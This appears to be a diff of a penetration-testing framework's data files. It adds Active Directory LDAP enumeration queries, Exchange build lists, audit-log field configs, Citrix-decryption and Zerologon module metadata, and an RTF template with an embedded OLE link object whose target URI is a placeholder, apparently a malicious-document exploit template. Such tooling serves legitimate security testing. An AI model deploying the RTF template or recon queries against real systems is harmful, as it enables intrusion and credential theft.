 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
-yard, 0.9.27, MIT
-zeitwerk, 2.5.4, MIT
+yard, 0.9.28, MIT
+zeitwerk, 2.6.0, MIT
@@ -1,3 +1,6 @@
+require 'fiddle'
+Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
+
 require 'rails'
 require File.expand_path('../boot', __FILE__)

@@ -0,0 +1,14 @@
+openssl_conf = openssl_init
+
+[openssl_init]
+providers = provider_sect
+
+[provider_sect]
+default = default_sect
+legacy = legacy_sect
+
+[default_sect]
+activate = 1
+
+[legacy_sect]
+activate = 1
@@ -0,0 +1,121 @@
+---
+queries:
+  - action: ENUM_ADCS_CAS
+    description: 'Enumerate ADCS certificate authorities.'
+    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pKIEnrollmentService)'
+    attributes:
+      - cn
+      - name
+      - cACertificateDN
+      - dNSHostname
+      - certificateTemplates
+  - action: ENUM_ADCS_CERT_TEMPLATES
+    description: 'Enumerate ADCS certificate templates.'
+    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pkicertificatetemplate)'
+    attributes:
+      - cn
+      - name
+      - displayName
+      - msPKI-Enrollment-Flag
+      - msPKI-Private-Key-Flag
+      - msPKI-Certificate-Name-Flag
+      - msPKI-RA-Signature
+      - pKIExtendedKeyUsage
+  - action: ENUM_ALL_OBJECT_CLASS
+    description: 'Dump all objects containing any objectClass field.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - objectClass
+  - action: ENUM_ALL_OBJECT_CATEGORY
+    description: 'Dump all objects containing any objectCategory field.'
+    filter: '(objectCategory=*)'
+    attributes:
+      - dn
+      - objectCategory
+  - action: ENUM_ACCOUNTS
+    description: 'Dump info about all known user accounts in the domain.'
+    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368))'
+    attributes:
+      - dn
+      - name
+      - displayName
+      - samAccountName
+      - userPrincipalName
+      - userAccountControl
+      - homeDirectory
+      - homeDrive
+      - profilePath
+  - action: ENUM_COMPUTERS
+    description: 'Dump all objects containing an objectCategory of Computer.'
+    filter: '(objectCategory=Computer)'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystemVersion
+      - operatingSystemServicePack
+  - action: ENUM_DOMAIN_CONTROLLERS
+    description: 'Dump all known domain controllers.'
+    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystemVersion
+      - operatingSystemServicePack
+  - action: ENUM_EXCHANGE_SERVERS
+    description: 'Dump info about all known Exchange servers.'
+    filter: '(&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystemVersion
+      - operatingSystemServicePack
+  - action: ENUM_EXCHANGE_RECIPIENTS
+    description: 'Dump info about all known Exchange recipients.'
+    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
+    attributes:
+      - dn
+      - mailNickname
+      - proxyAddresses
+      - name
+  - action: ENUM_GROUPS
+    description: 'Dump info about all known groups in the LDAP environment.'
+    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup))'
+    attributes:
+      - dn
+      - name
+      - groupType
+      - memberof
+  - action: ENUM_ORGUNITS
+    description: 'Dump info about all known organizational units in the LDAP environment.'
+    filter: '(objectClass=organizationalUnit)'
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGROLES
+    description: 'Dump info about all known organization roles in the LDAP environment.'
+    filter: '(objectClass=organizationalRole)'
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
@@ -0,0 +1,9 @@
+---
+queries:
+#  - action: SAMPLE_ACTION
+#    description: 'A description.'
+#    # base_dn_prefix: 'An optional string to prefix to the Base DN'
+#    filter: '(objectClass=*)'
+#    attributes:
+#      - dn
+#      - objectClass
@@ -186,6 +186,9 @@
    {
      "name": "Exchange Server 2013",
      "builds": [
+        "15.0.1497.40",
+        "15.0.1497.36",
+        "15.0.1497.33",
        "15.0.1497.28",
        "15.0.1497.26",
        "15.0.1497.24",
@@ -226,6 +229,12 @@
    {
      "name": "Exchange Server 2016",
      "builds": [
+        "15.1.2507.12",
+        "15.1.2507.9",
+        "15.1.2507.6",
+        "15.1.2375.31",
+        "15.1.2375.28",
+        "15.1.2375.24",
        "15.1.2375.18",
        "15.1.2375.17",
        "15.1.2375.12",
@@ -280,6 +289,12 @@
    {
      "name": "Exchange Server 2019",
      "builds": [
+        "15.2.1118.12",
+        "15.2.1118.9",
+        "15.2.1118.7",
+        "15.2.986.29",
+        "15.2.986.26",
+        "15.2.986.22",
        "15.2.986.15",
        "15.2.986.14",
        "15.2.986.9",
@@ -318,4 +333,4 @@
      "eol": false
    }
  ]
-}
+}
@@ -0,0 +1,30 @@
+{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
+\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
+4f4c45324c696e6b000000000000000000000c0000
+d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
+70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
+0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
+0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
+00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
+8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
+0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
+000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
+}}}}
@@ -0,0 +1,297 @@
+---
+AdapFileAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- SOURCE
+# - REMARKS
+# - OBJECT_SERVER
+# - OBJECT_TYPE
+# - HANDLE_ID
+# - OBJECT_NAME
+# - UNC_NAME
+# - FILE_NAME
+# - FILE_LOCATION
+# - LOGON_ID
+# - OPERATION_ID
+- PRIMARY_USER_NAME
+- PRIMARY_DOMAIN
+- PRIMARY_LOGIN_ID
+- CLIENT_USER_NAME
+- CLIENT_DOMAIN
+- CLIENT_LOGIN_ID
+- DOMAIN
+# - RESTRICTED_SID_COUNT
+# - ACCESSES
+# - PROCESS_ID
+# - PRIVILEGES_USED
+# - PRIVILEGES
+# - PROCESS_NAME
+# - NEW_SEC_DESC
+# - ORIGINAL_SEC_DESC
+# - NEW_PERMISSIONS
+# - ORIGINAL_PERMISSIONS
+# - ACL_CHANGE
+# - TRANSACTION_ID
+# - ACCESS_MASK
+- USERNAME
+# - RECORD_NUMBER
+- USER_SID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_TEXT
+# - FORMAT_MESSAGE
+- USER_SAM_ACCOUNT_NAME
+- USER_DISPLAY_NAME
+- USER_PRINCIPAL_NAME
+- USER_GUID
+- USER_DISTINGUISH_NAME
+- USER_OU_GUID
+- USER_DEPARTMENT
+- USER_MANAGER_NAME
+- SOURCE_NAME
+# - LOG_FILE_NAME
+# - KEYWORDS_NAME
+# - TASK_CATEGORY_NAME
+# - TASK_CATEGORY_ID
+# - FILE_TYPE
+- SHARE_NAME
+# - EXTRA_COLUMN1
+# - EXTRA_COLUMN2
+# - EXTRA_COLUMN3
+# - EXTRA_COLUMN4
+# - EXTRA_COLUMN5
+# - EXTRA_COLUMN6
+# - EXTRA_COLUMN7
+# - EXTRA_COLUMN8
+# - EXTRA_COLUMN9
+# - EXTRA_COLUMN10
+- CONFIGURED_DOMAIN_NAME
+# - NEW_PRIVILEGES_USED
+AdapPowershellAuditLog:
+- UNIQUE_ID
+# - COMMAND_NAME
+# - COMMAND_PATH
+# - COMMAND_TYPE
+# - COMMAND_INVOCATION
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_CATEGORY
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - HOST_APPLICATION
+- HOST_NAME
+# - SCRIPTBLOCK_ID
+# - RECORD_NUMBER
+# - SCRIPT_NAME
+# - SCRIPT_DATA
+# - SCRIPT_SNO
+# - SEVERITY
+# - TIME_GENERATED
+- CALLER_USER_NAME
+- CALLER_USER_SID
+# - TOTAL_NO
+# - MONITOR_ID
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - SCRIPT_DATA_JSON
+AdapSysmonAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - FORMAT_MESSAGE
+- CALLER_USER_SID
+- CALLER_USER_NAME
+- CALLER_USER_DOMAIN
+- CALLER_USER_LOGON_ID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- PROCESS_NAME
+- PARENT_PROCESS_NAME
+# - PROCESS_ID
+# - FILE_NAME
+# - INTEGRITY_LEVEL
+# - QUERY_STRING
+# - PARENT_PROCESS_ID
+# - PARENT_CMD_LINE
+# - QUERY_STATUS
+# - ACCESS_TYPE_TEXT
+# - ACCESS_TIME
+# - CREATION_TIME
+# - PREVIOUS_CREATION_TIME
+# - PROCESS_GUID
+# - RULE_NAME
+# - LOADED_FILE
+# - HASHED_VALUE
+# - FOLDER_PATH
+# - PARENT_PROCESS_GUID
+# - SESSION_ID
+# - IS_SIGNED
+# - SIGNATURE
+# - SIGNATURE_STATUS
+# - IS_ARCHIVED
+# - THREAD_ID
+- SOURCE_IP_ADDRESS
+# - PRODUCT_DESCRIPTION
+- DESTINATION_IP_ADDRESS
+- DESTINATION_HOST_NAME
+# - PORT_NUMBER
+# - PARENT_PORT_NUMBER
+# - REGISTRY_NAME
+# - QUERY_RESULT
+# - SCHEMA_VERSION
+# - WORKING_DIRECTORY
+- COMPANY_NAME
+- SOURCE_HOST_NAME
+- CALLER_USER_LOGON_GUID
+# - PARENT_PORT_NAME
+# - SERVICE_VERSION
+# - FILE_VERSION
+# - PRODUCT_NAME
+# - PORT_NAME
+AdapDNSAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - DNS_SETTING
+# - LOOKUP
+# - DNS_SCOPE
+# - DNS_OBJECT_GUID
+# - DISTINATION_ZONE
+# - OLD_DIRECTORY_PARTITION
+# - USER_ACTION
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_LOGON_ID
+# - DNS_QUERY_NAME
+# - OBJECT_CLASS_TEXT
+# - DNS_SETTING_NAME
+- DISTINGUISHED_NAME
+# - OBJECT_GUID
+# - DNS_ZONE_NAME
+# # - REGISTRY_VALUE
+# - FORMAT_MESSAGE
+# - RECORD_NUMBER
+- CALLER_USER_SID
+# - DNS_SETTING_VALUE
+# - CORRELATION_ID
+# - ATTRIBUTES_NEW_VALUE
+# - ATTRIBUTES_OLD_VALUE
+# - TTL_VALUE
+# - DNS_MGMT_TYPE
+# - DNS_ZONE_TYPE
+# - DNS_ZONE_TYPE_STRING
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_GUID
+# - OP_APPLN_CORRELATION_ID
+# - OP_TREE_DELETE
+# - DIRECTORY_PARTITION
+# - ROOT_CAUSE
+# - FILE_NAME
+# - VIRTUALIZATION_INSTANCE
+# - ERROR_CODE_TEXT
+# - DNS_RESPONSE_DATA
+- DNS_SERVER_NAME
+# - LINE_NUMBER
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+# - NEXT_SCAVENGE_SCHEDULE
+# - RECORD_NAME
+# - RUNNING_TIME
+# - TIME_OUT
+# - DNS_NODE
+# - DNS_ZONE_FILE
+- FOREST_NAME
+# - SCAVENGED_NODES
+# - SCAVENGED_PERC
+# - SCAVENGED_RECORDS
+# - SERVICE_NAMES
+# - SLEEPING_TIME
+# - VISITED_NODES
+# - VISITED_ZONES
+AdapADReplicationAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - REMARKS
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CALLER_USER_SID
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_LOGON_ID
+- CALLER_USER_GUID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+# - ALTERNATE_USER_ACTION
+# - DIRECTORY_PARTITION
+# - ERROR_CODE
+# - ERROR_CODE_TEXT
+# - EXTENDED_REQUEST_CODE
+# - FAILING_DNS_HOST
+# - HIGHEST_USN
+# - INTERSITE_TRANSPORT
+# - LAST_REPLICATION_DATE
+# - OBJECT_GUID
+# - OBJECT_NAME
+# - COMMON_NAME_PATH
+# - OPERATION
+# - REASON
+- REGISTRY_KEY
+# - REMOVE_LINGERING_OBJECTS
+# - SECONDARY_ERROR_VALUE
+- SERVICE_PRINCIPAL_NAME
+- SITE_NAME
+- SOURCE_DIRECTORY_SERVICE
+- SOURCE_DS_DOMAIN_NAME
+- SOURCE_DS_GUID
+- SOURCE_DS_NAME
+- SOURCE_DS_STARTING_ID
+# - THREAD_ID
+# - TIMEOUT_PERIOD
+# - TOMBSTONE_LIFE_TIME
+# - TRANSPORT_NAME
+# - USER_ACTION
+# - ATTRIBUTES_NAME
+# - ATTRIBUTES_VALUE
+# - SOURCE_DRA
+# - DESTINATION_DRA
+# - DESTINATION_DS_NAME
+# - DRS_OPTIONS
+# - REPL_EVENT_COUNT
+# - REPL_STATUS_CODE
+# - SESSION_ID
+# - START_USN
+# - END_USN
+# - TYPE_OF_CHANGE
@@ -0,0 +1,259 @@
+---
+DSPEmailAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - ATTACHMENT_ID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_MESSAGE
+# - PROCESS_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION_VALUE
+# - MAIL_CLASSFICATION
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+# - SOURCE_ID
+- USER_SID
+- USERNAME
+# - PROCESS_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+# - UNC_NAME
+# - LOCATION
+# - MESSAGE
+# - FILE_FOLDER_NAME
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - OLD_SHARE_PATH
+# - NEW_SHARE_PATH
+# - SHARE_ID
+# - IS_SUCCESS_EVENT
+# - IS_DIRECTORY
+# - IS_TRANSACTION
+# - ACTION_ID
+# - ACCESS_MASK
+# - THREAD_ID
+# - CALLBACK_MAJOR_ID
+# - CALLBACK_MINOR_ID
+# - PROFILE_ID
+# - USER_ID
+# - OLD_SACL
+# - NEW_SACL
+# - DIFF_SACL
+# - FILE_SIZE
+- CLIENT_IP
+- CLIENT_HOST
+- OWNER_INFO
+# - OTHERINFO_1
+# - OTHERINFO_2
+# - IS_SENSITIVE_DATA
+# - FILETYPE_EXTENSION
+# - FILETYPE_CATEGORY
+# - ACCESS_FROM
+# - EVENT_GENERATED_BY
+# - LOGIN_ID
+- LOGIN_NAME
+- OWNER_SID
+# - IS_USB_EVENT
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointClassificationReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - CLASSIFICATION_ID
+# - CLASSIFICATION_VALUE
+# - CLASSIFICATION_MSG
+# - LOCAL_PATH
+# - FILE_FOLDER_NAME
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+- FILE_OWNER
+- OWNER_SID
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - MEDIA_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+DSPEndpointIncidentReport:
+- INCIDENT_ID
+- SOURCE
+# - MODULE_NAME
+# - INCIDENT_TIME
+# - COMPLETION_TIME
+- TIME_GENERATED
+# - MESSAGE
+# - LOCATION
+# - ENDPOINT_ID
+# - INCIDENT_STATUS
+# - VIOLATED_POLICY
+# - DOMAIN_ID
+- ENDPOINT_NAME
+- USERNAME
+# - USER_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - FILE_FOLDER_NAME
+- USER_SID
+# - FILETYPE_EXTENSION
+# - IS_USB_EVENT
+- NOTIFY_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION
+# - PRINTER_NAME
+# - FILENAME
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+# - TOTAL_PAGES
+- CLIENTIPLIST
+- URL
+# - CLASSIFICATION_VALUE
+# - INCIDENT_PROFILE_ID
+# - INCIDENT_PROFILE_NAME
+# - INCIDENT_SEVERITY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+- CLIENT_HOST
+DspEndpointPrinterAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - PRINTER_NAME
+# - FILENAME
+# - LOCAL_PATH
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+- NOTIFY_NAME
+# - TOTAL_PAGES
+# - FILE_SIZE
+# - CREATION_TIME
+- CLIENTIPLIST
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DspEndpointWebAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - NEW_FILE_NAME
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - PROCESS_NAME
+# - MESSAGE
+# - URL
+- CLIENT_IP
+# - PROFILE_ID
+- PROFILE_NAME
+DSPFileAnalysisAlerts:
+- INCIDENT_ID
+# - VIOLATED_PROFILE
+# - SERVER_ID
+# - DRIVE_LETTER
+# - SOURCE_ID
+- TIME_GENERATED
+# - SECURITY_ID
+- SERVERNAME
+# - FILE_ATTRIBUTES
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - YEAR_CREATED
+# - FILE_FOLDER_NAME
+# - LOCAL_PATH
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - IS_DIRECTORY
+# - IS_STALE
+# - NON_BUSINESS_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+RAAlertHistory:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RISK_SCORE
+# - ENTITY_ID
+RAIncidents:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RAISED_INCIDENT
+# - SOURCE_ID
+# - RISK_SCORE
+# - VIOLATION_SCORE
+# - POLICY_SCORE
+# - PERMISSION_SCORE
+# - AUDIT_SCORE
+# - USER_SCORE
+# - SCORE_DESCRIPTION
+# - ENTITY_ID
@@ -0,0 +1,2 @@
+$someText = "Hello!" ; $someText > "C:\flag.txt"
+
@@ -447,6 +447,54 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/citrix/citrix_netscaler_config_decrypt": {
+    "name": "Decrypt Citrix NetScaler Config Secrets",
+    "fullname": "auxiliary/admin/citrix/citrix_netscaler_config_decrypt",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-05-19",
+    "type": "auxiliary",
+    "author": [
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "This module takes a Citrix NetScaler ns.conf configuration file as\n          input and extracts secrets that have been stored with reversible\n          encryption. The module supports legacy NetScaler encryption (RC4)\n          as well as the newer AES-256-ECB and AES-256-CBC encryption types.\n          It is also possible to decrypt secrets protected by the Key\n          Encryption Key (KEK) method, provided the key fragment files F1.key\n          and F2.key are provided.",
+    "references": [
+      "URL-https://dozer.nz/posts/citrix-decrypt/",
+      "URL-https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/"
+    ],
+    "platform": "BSD",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-07-13 08:36:18 +0000",
+    "path": "/modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb",
+    "is_install_path": true,
+    "ref_name": "admin/citrix/citrix_netscaler_config_decrypt",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/db2/db2rcmd": {
    "name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability",
    "fullname": "auxiliary/admin/db2/db2rcmd",
@@ -522,7 +570,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2021-02-16 13:56:50 +0000",
+    "mod_time": "2022-08-03 14:27:30 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/cve_2020_1472_zerologon",
@@ -532,6 +580,116 @@
    "notes": {
      "AKA": [
        "Zerologon"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
